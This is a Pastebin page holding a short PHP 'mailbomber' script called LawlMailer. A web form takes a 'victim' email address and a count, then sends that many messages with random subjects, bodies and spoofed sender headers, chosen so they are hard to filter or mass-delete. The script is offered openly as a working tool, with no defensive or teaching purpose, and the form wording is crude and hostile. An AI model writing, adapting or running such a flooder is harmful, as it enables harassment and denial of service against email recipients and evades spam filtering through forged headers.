Advertisement
p4ste

Mailbomber, LawlMailer

Jan 26th, 2014
792
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.37 KB | None | 0 0
  1. http://p4ste.tumblr.com
  2.  
  3. <title>lawlmailer</title>
  4. <style>
  5. body {
  6. font-family: Verdana;
  7. font-size: 18px;
  8. }
  9. input {
  10. background-color: #FFFFFF;
  11. font-family: Verdana;
  12. font-size: 18px;
  13. border: 2px solid #000000;
  14. }
  15. </style>
  16. <?php
  17. set_time_limit(0);
  18. // newer bomb mailer script, designed to send random data each time to help prevent mails from being mass deleted
  19.  
  20. if ($_POST[to] && $_POST[x] >= 1 && is_numeric($_POST[x])) {
  21.  
  22. for($i = 1; $i <= $_POST[x]; $i ++) {
  23.  
  24. $random = rand(0,9999);
  25.  
  26. $t = $_POST[to];
  27. $b = base64_encode(md5($random*$i));
  28. $s = base64_encode(md5($random*2*$i));
  29. $one = md5($random+$i);
  30. $two = md5($random-$i);
  31. $s = str_replace("=", "", $s);
  32. $b = str_replace("=", "", $b);
  33. $h = "Return-Path: <$one@$two.com>\nFrom: $one@$two.com";
  34.  
  35. @mail($t, $s, $b, $h);
  36. ob_flush();
  37. flush();
  38. print "mailed #$i of $_POST[x]<br>";
  39.  
  40. }
  41.  
  42. } else {
  43.  
  44. print "Welcome! Choose now whom is the victim and how many the victim shall receive.<br><br><br>
  45. <form action=\"$_SERVER[PHP_SELF]\" method=post>
  46. email <input type=text name=to> x <input type=text name=x value=300 size=5> = LOL WUT<br><br>
  47. <input type=submit value=\"bomb that bitch\">
  48. </form>";
  49.  
  50. }
  51.  
  52. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement